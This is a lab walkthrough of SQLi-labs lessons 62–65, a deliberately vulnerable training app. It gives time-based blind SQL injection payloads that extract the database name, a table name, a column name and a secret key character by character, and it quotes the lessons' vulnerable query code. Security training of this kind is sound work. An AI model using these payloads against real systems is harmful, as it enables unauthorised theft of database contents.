Blind based. Use ascii() function to make the result more accurate(table name is case sensitive, secret key is not).

SQLi-labs: Lesson 62

Union select does not work. Let's try time delayed injection.

See Lesson 15, Lesson 46 for details

  • ?id=1') and If(ascii(substr(database(),1,1))=116,0,sleep(5))--+
  • ?id=1') and If(substr(database(),1,8)='security',0,sleep(5))--+
  • ?id=1') or if ((select substr((select version()),1,1))=5,sleep(2),null)--+

SQLi-labs: Lesson 63

  1. Get table name

    First you can get the length of table name(number of characters): ?id=1' and if(substr((select char_length(concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c))),1,1)='1', sleep(3),null)--+

    After several attempts, we can get a number 12. Since we added two custom charaters 0x5c, the table name actually contains 10 characters.

    Then we can use the following query to narrow down the scope:

    • ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>'o', sleep(3),null)--
    • ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1)>'m', sleep(3),null)--+

    After several attempts,we can get the table name: QPI3LTNI2S

    Sometimes you don't need to get table name if you want to get column name. Try following query in your database:

    select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select group_concat(table_name) from information_schema.tables where table_schema=database());

  2. Get column name(ditto)

  3. Get the secret key(ditto)

    • ?id=1' and if(substr((select char_length(concat(0x5c, (select secret_B71M from QPI3LTNI2S),0x5c))),1,1)='2', sleep(3),null)--+
    • ?id=1' and if(substr((select char_length(concat(0x5c, (select secret_B71M from QPI3LTNI2S),0x5c))),2,1)='6', sleep(3),null)--+

    So the secret key has (26-2)=24 characters.

    • ?id=1' and if(substr((select secret_B71M from QPI3LTNI2S),1,1)='5',sleep(3),null)--+
    • ?id=1' and if(substr((select secret_B71M from QPI3LTNI2S),2,1)='B',sleep(3),null)--+

    Finally, we have the secret key: 5BXNSLRW7XHHDYLP0NFFCZNZ

SQLi-labs: Lesson 64

Source code: $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

Queries are similar:

?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>ascii('x'), sleep(3),null)--+

SQLi-labs: Lesson 65

Source code:

$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

Queries are similar:

?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=ascii('X'), sleep(3),null)--+

Lesson 66-75: No source. The author didn't post them in his webpage.

results matching ""

    No results matching ""